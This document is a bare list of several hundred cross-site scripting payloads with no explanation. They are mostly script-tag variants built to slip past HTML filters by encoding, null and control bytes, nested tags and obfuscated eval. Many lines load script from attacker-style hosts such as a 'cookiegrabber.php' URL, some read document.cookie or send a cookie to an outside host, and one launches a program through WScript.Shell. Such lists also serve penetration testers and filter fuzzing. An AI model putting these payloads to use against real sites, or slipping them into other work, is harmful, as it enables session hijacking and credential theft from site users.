<SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7"></SCRIPT>
<SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJKTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0EJCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0UJKSAJKCAJKSAJICA7"></SCRIPT>
<script src=”data:text/javascript,confirm(1)”></script>
“/><script src=”data:text/javascript,confirm(1)”></script>
<script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
“<script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”
“\”><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”,
<script src=”data:text/plain\x2Cjavascript:alert(1)”></script>
<script/src=data:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(4)></script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
<script src=data:,\u006fnerror=\u0061lert;throw[document.domain]></script>
<script src=”data:\xCB\x8F,javascript:alert(1)”></script>
<script src=”data:\xD4\x8F,javascript:alert(1)”></script>
<script src=”data:\xE0\xA4\x98,javascript:alert(1)”></script>
<script src=//domain%26sol;my.js%26num;
<script src=”//domain%26sol;my.js%26num;
<script src=//DOMAIN/></script>
“><script src=”file:///c:/wonderful.js”></script><”
‘> →<script/src=//go.bmoine.fr/xss>
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>”
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
<;SCRIPT SRC=//ha.ckers.org/.j>;
<SCRIPT SRC=//ha.ckers.org/.j>
<script src=//HOST/SCRIPT></script>
<SCRIPT =”>” SRC=”http://3w.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<;SCRIPT SRC=”;http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
<SCRIPT SRC=”http://ha.ckers.org/xss.jpg"></SCRIPT>
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
<SCRIPT =”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT+SRC=http://host/
<script src=”/?http://html5sec.org/test.js “></script>
<SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT>
<SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser
<script src=http://renwa.tk/d.js></script>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
//|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
<script src=https://www.google.com/complete/search?client=chrome
<script src=’https://www.n00py.io/evil.js'></script>
“<script src=’https://www.n00py.io/evil.js'></script>"
<script src=”http://www.evilsite.org/cookiegrabber.php"></script>
<script SRC=”http://www.securitycompass.com/xss.jpg"></script>
<script =”>” SRC=”http://www.securitycompass.com/xss.js"></script>
<script> src=”http://www.site.com/XSS.js"></script>
‘>”><script src = ‘http://www.site.com/XSS.js'></script>
‘>”><script src = ‘http://www.site.com/XSS.js'></script>
<SCRIPT SRC=”http://xss.cx/xss.jpg"></SCRIPT>
<SCRIPT SRC=http://xss.cx/xss.js?<B>
//|\\ <script //|\\ src=’http://xss.cx/xss.js'> //|\\ </script //|\\
<SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
<SCRIPT =”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT src=”http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<script src=http://xssor.io/xss.js></SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<script src=http://yoursite.com/your_files.js></script>
<script src=”//INPUT”></script>
<script src=”INPUT”></script
<script src=”javascript:alert(1)”>
<script src=javascript:alert(1)>
<script src=javascript:alert(1)>
<script src=javascript:alert(160)>
<script src=”javascript:alert(3)”></script> // IE6, O11.01, OM10.1
<SCRIPT SRC=”%(jpg)s”></SCRIPT>
<script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
<script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(17)’)()}}
<SCRIPT SRC=%(jscript)s?<B>
<script src=”/\%(jscript)s”></script>
<script src=”\\%(jscript)s”></script>
<script src=%(jscript)s></script>
<SCRIPT/SRC=”%(jscript)s”></SCRIPT>
<script src=//l0.cm>//20
<SCRIPT SRC_NeatHtmlReplace=”//ha.ckers.org/.j”>
<SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.jpg"></SCRIPT>
<SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.js"></SCRIPT>
<script+src=”>”+src=”http://yoursite.com/xss.js?69,69"></script>
<script src=/upload/…></script>
<script src=”URL”></script>
<script src=URL></script>
<script/src=//xss.cx>/*
<script src=/xss.js></script><base href=//evil/
<script>’str1ng’.replace(/1/,alert)</script>
<script>str=’’;for(i=0;i<0xefff;i++){str+=’<script>AAAAAA’;};document.write(‘<svg>’+str+’</svg>’);</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59)</script>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
</script><svg ‘//”
“></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
</script><svg onload=alert(1)>
</script><svg onload=alert(184)>
</script><svg onload=’-/”/-confirm(1)//’”
</script><svg onload=’-/”/-confirm(1)//’
→’”/></sCript><svG x=”>” onload=(co\u006efirm)``>
/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i,
/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i;
“/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i”
( /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i)
<script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<script>this[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
<script>this[490837..toString(1<<5)](/*code to eval()*/)</script>
<script>this[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>throw new class extends Function{}(‘alert(1)’)``</script>
→</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
→</script></title></style>”/</textarea><a’ onclick=alert()//>*/alert()/*
>]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img -
<script>top[‘alert’](3)</script>
<script>try{eval(“<></>”);logBoolean(1)}catch(e){logBoolean(0)};</script>
<script type=”text/javascript”></script>
<script type=text/javascript></script>
<script type=text/vbscript>msgbox document.location</script>
<script type=text/vbscript>msgbox document.location</script> // IE 10
<script type=”text/xaml”><Canvas Loaded=”confirm” /></script>
<script type=vbscript>MsgBox(0)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074`1`</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 Variation
<script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
<script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script>
<script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
<script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U
<script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
<script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script>
<script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script> // ES6 Variation
?scriptualert(EXSSE)?/scriptu
<script> “\ud83d\u*hex4*”.match(/.*<.*/) ? log(*num*) : null; </script>
<script>-{valueOf:location,toString:[].pop,0:’vbscript:alert%281%29',length:1}</script>
<script>-{valueOf:location,toString:[].pop,0:’vbscript:confirm%281%29',length:1}</script>
<script>var%20c=1337";alert(c)</script>
<script>var%20x%20=%20a?aa?;%20confirm(1);//a?;</script>
<script>var a = “</script> <script> alert(‘XSS !’); </script> <script>”;</script>
<script>var fn=window[490837..toString(1<<5)];fn(atob(‘YWxlcnQoMSk=’));</script>
<script>var fn=window[490837..toString(1<<5)];fn(/*code to eval()/*);</script>
<script>var fn=window[atob(‘ZXZhbA==’)];fn(atob(‘YWxlcnQoMSk=’));</script>
<script>var fn=window[atob(‘ZXZhbA==’)];fn(/*code to eval()/*);</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)];fn(atob(‘YWxlcnQoMSk=’));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)];fn(/*code to eval()/*);</script>
<script> vari=location.hash; document.write(i); </script>
<script>var junk = ‘</script><script>alert(1)</script>’;</script>
<script>var location={};</script>
<script>var m=<html><a href=”//host”>link</a>
<script>var m=<html><a href=//site>link</a>
<script>var m=<html><a href=//site>link</a></html></script> // XML inside JS
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
<script>var name=”&quot;-alert``//”</script>
<script>var q=””;alert(1)//”</script>
<script>var q=””;location=’javascript\x3Aalert\x281\x29'//”</script>
<script>var q=””;location=’javascript\x3Aalert\x2822\x29'//”</script>
<script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
<script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
<script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
<script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
<script>var var = 1; alert(var)</script>
<script>var var = 1; alert(var)</script>
<script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
<script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
“/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
<script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
<script> Var x=vInputv; </script>
<script/v>confirm(/@jackmasa/)</script>
<script>void(‘&b=’);alert(1);</script>
<script>window[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
<script>window[490837..toString(1<<5)](/*code to eval()*/)</script>
<script>window[‘alert’](0)</script>
<script>window[‘alert’](document[‘domain’])<script>
<script>window.alert(‘XSS Vulnerable’);</script>
/><script>window.alert(‘XSS Vulnerable’);</script>
<script>window[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
<script>window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
<script>window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
←’<script>window.confirm(1)</script> — !>
`’”><script>window[‘log*chr*’](*num*)</script>
‘<script>window.onload=function(){document.forms[0].message.value=’1';}</script>
<script>window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
<script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
<script>write(a?<img/src=//xss.cx/?a?+cookie.replace(/\s/g,””)+a?>a?)></script>
<script\x00>alert(1)</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<script\x00>javascript:alert(1)</script>
“`’><script>\x00javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
“`’><script>\x09javascript:alert(1)</script>
<script\x09type=”text/javascript”>javascript:alert(1);</script>
<script\x0A>javascript:alert(1)</script>
“`’><script>\x0Ajavascript:alert(1)</script>
<script\x0Atype=”text/javascript”>javascript:alert(1);</script>
“`’><script>\x0Bjavascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
“`’><script>\x0Cjavascript:alert(1)</script>
<script\x0Ctype=”text/javascript”>javascript:alert(1);</script>
<script\x0D>javascript:alert(1)</script>
“`’><script>\x0Djavascript:alert(1)</script>
<script\x0Dtype=”text/javascript”>javascript:alert(1);</script>
<script\x20>javascript:alert(1)</script>
“`’><script>\x20javascript:alert(1)</script>
<script\x20type=”text/javascript”>javascript:alert(1);</script>
“`’><script>\x21javascript:alert(1)</script>
<script>/* *\x2A/javascript:alert(1)// */</script>
“`’><script>\x2Bjavascript:alert(1)</script>
<script\x2F>javascript:alert(1)</script>
‘“`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script\x2Ftype=”text/javascript”>javascript:alert(1);</script>
“`’><script>\x3Bjavascript:alert(1)</script>
<script\x3Etype=”text/javascript”>javascript:alert(1);</script>
“`’><script>\x7Ejavascript:alert(1)</script>
<script/x>alert(1)</script>
<script x> alert(1) </script 1=2
<script>!{x(){alert(1)}}.x()</script>
<script x> alert</script 1=2
<script x>alert(‘XSS’)<script y>
“><script x=#”async=#”src=”//a?a?L
“`’><script>\xC2\x85javascript:alert(1)</script>
“`’><script>\xC2\xA0javascript:alert(1)</script>
<script>x=”confirm(1)”.replace(/.+/,eval)//”</script>
<script x> confirm(1) </script 1=2
“/><script x> confirm(1) </script 1=2
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
“`’><script>\xE1\x9A\x80javascript:alert(1)</script>
“`’><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
“`’><script>\xE2\x80\x80javascript:alert(1)</script>
“`’><script>\xE2\x80\x81javascript:alert(1)</script>
“`’><script>\xE2\x80\x82javascript:alert(1)</script>
“`’><script>\xE2\x80\x83javascript:alert(1)</script>
“`’><script>\xE2\x80\x84javascript:alert(1)</script>
“`’><script>\xE2\x80\x85javascript:alert(1)</script>
“`’><script>\xE2\x80\x86javascript:alert(1)</script>
“`’><script>\xE2\x80\x87javascript:alert(1)</script>
“`’><script>\xE2\x80\x88javascript:alert(1)</script>
“`’><script>\xE2\x80\x89javascript:alert(1)</script>
“`’><script>\xE2\x80\x8Ajavascript:alert(1)</script>
“`’><script>\xE2\x80\x8Bjavascript:alert(1)</script>
“`’><script>\xE2\x80\xA8javascript:alert(1)</script>
“`’><script>\xE2\x80\xA9javascript:alert(1)</script>
“`’><script>\xE2\x80\xAFjavascript:alert(1)</script>
“`’><script>\xE2\x81\x9Fjavascript:alert(1)</script>
“`’><script>\xE3\x80\x80javascript:alert(1)</script>
“`’><script>\xEF\xBB\xBFjavascript:alert(1)</script>
“`’><script>\xEF\xBF\xAEjavascript:alert(1)</script>
“`’><script>\xEF\xBF\xBEjavascript:alert(1)</script>
“`’><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
<script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
<script xmlns=”http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
<_:script xmlns:_=”hxxp://www.w3.org/1999/xhtml">alert(65)</_:script>
<script>x=new ActiveXObject(“WScript.Shell”);x.run(‘calc’);</script>
<script>x=new class extends Function{}(‘alert(1)’); x=new x;</script>
</script><x ng-app ng-csp>{{constructor.constructor(‘alert(1)’)()}}
<script>x=””^prompt(9)^””;y=42;</script>
<script>x=””<<prompt(9)<<””;y=42;</script>
<script>x=””<=prompt(9)<=””;y=42;</script>
<script>x=””<prompt(9)<””;y=42;</script>
<script>x=””===prompt(9)===””;y=42;</script>
<script>x=””==prompt(9)==””;y=42;</script>
<script>x=””>=prompt(9)>=””;y=42;</script>
<script>x=””>>>prompt(9)>>>””;y=42;</script>
<script>x=””>>prompt(9)>>””;y=42;</script>
<script>x=””>prompt(9)>””;y=42;</script>
<script>x=””||prompt(9)||””;y=42;</script>
<script>x=””|prompt(9)|””;y=42;</script>
<script>x=””-prompt(9)-””;y=42;</script>
<script>x=””!=prompt(9)!=””;y=42;</script>
<script>x=””?prompt(9):””;y=42;</script>
<script>x=””/prompt(9)/””;y=42;</script>
<script>x=””*prompt(9)*””;y=42;</script>
<script>x=””&&prompt(9)&&””;y=42;</script>
<script>x=””&prompt(9)&””;y=42;</script>
<script>x=””%prompt(9)%””;y=42;</script>
<script>x=””+prompt(9)+””;y=42;</script>
<script>x=’<%’</script> %>/alert(2)</script>
<ScRIPT x src=//0x.lv?
<SCRIPT/XSS id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"></SCRIPT>
<;SCRIPT/XSS SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/XSSSRC=”http://host"></SCRIPT>
<SCRIPT/XSS SRC=”http://xss.cx/xss.js"></SCRIPT>
<SCRIPT/XSS SRC=”http://xss.rocks/xss.js"></SCRIPT>
<script>z=’document.’</script>
<script>z=document.</script>
<script>z=+write(“</script>
<script>z=z+’js></sc’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’ript>”)’</script>
<script>z=z+<script</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’w.shell’</script>
“><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
<scri\x00pt>alert(1);</scri%00pt>
<Scri \ x00pt> alert (1); </ scri% 00pt>
<scri\x00pt>confirm(1);</scri%00pt>
</Scrpt/”%27 — !>%20<Scrpt>%20confirm(1)%20</Scrpt>
<SCR?PT>alert(181)</SCR?PT>
<SCR?PT>alert(41)</SCR?PT>
<SCR?PT/SRC=data:,alert(182)>
<SCR?PT/SRC=data:,alert(42)>
<scr<script>ipt>alert(0x000123)</script>
\”><scr<script>ipt>alert(0x000123)</script>
<scr<script>ipt>alert(0x000123)</scr</script>ipt>
\”<scr<script>ipt>alert(0x000123)</scr</script>ipt>
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<scr<script>ipt>alert(1)</scr</script>ipt>
<scr<script>ipt>alert(1)</scr<script>ipt>
<scrscriptipt>alert(1)</scrscriptipt>
<scrscriptipt>alert(1)</scrscriptipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<scr<script>ipt>alert(1)</scr<script>ipt>F
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
